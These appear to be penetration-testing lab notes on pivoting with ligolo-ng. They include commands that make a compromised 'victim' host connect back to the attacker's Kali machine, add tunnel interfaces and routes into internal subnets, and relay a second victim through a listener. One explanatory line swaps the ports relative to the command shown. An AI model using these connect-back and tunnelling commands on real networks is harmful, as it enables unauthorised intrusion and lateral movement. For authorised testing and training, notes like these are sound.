# Port Forwarding

## Ligolo

## Starting listener server

```bash
./proxy -laddr 192.168.146.158:5555 -selfcert
```

## Connecting from victim back to kali

```bash
./agent -connect 192.168.45.223:11601 -ignore-cert
```

## Creating a new interface

```bash
sudo ip tuntap add user $(whoami) mode tun ligolo2 ; sudo ip link set ligolo2 up

# Adding routes
sudo ip r add 10.4.216.0/24 dev ligolo2

```

## Connecting to newly added connection

```bash
ligolo-ng » session
? Specify a session : 1 - #1 - CRAFT2\apache@CRAFT2 - 192.168.230.188:49785
[Agent : CRAFT2\apache@CRAFT2] » ifconfig
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet0 2                    │
│ Hardware MAC │ 00:50:56:ab:d7:a7              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.230.188/24             │
└──────────────┴────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 1                                  │
├──────────────┬───────────────────────────────┤
│ Name         │ Loopback Pseudo-Interface 1   │
│ Hardware MAC │                               │
│ MTU          │ -1                            │
│ Flags        │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128                       │
│ IPv4 Address │ 127.0.0.1/8                   │
└──────────────┴───────────────────────────────┘
[Agent : CRAFT2\apache@CRAFT2] » start --tun craft2-pv
[Agent : CRAFT2\apache@CRAFT2] » INFO[0307] Starting tunnel to CRAFT2\apache@CRAFT2  
```

## Connecting to victim local server port

<pre class="language-bash"><code class="lang-bash">sudo ip tuntap add user $(whoami) mode tun craft2-pv ; sudo ip link set craft2-pv up
<strong>sudo ip r add 240.0.0.1/32 dev craft2-pv
</strong></code></pre>

## Connecting to another multiple internal network

```
[Agent : confluence@confluence01] » listener_add --addr 0.0.0.0:8888 --to 192.168.45.223:8080  --tcp
```

anything connects to port 8080 on victim will connect back to us on port 8888

* first victim listen on port 8888
* redirect all received traffic to kali server port 8080
* second victim connect to first victim on port 8888
* traffic will be redirected back to kali server

```powershell
agent.exe -connect 192.168.26.131:8888 -ignore-cert
```

<https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b>

[https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683\
\
https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel](https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel)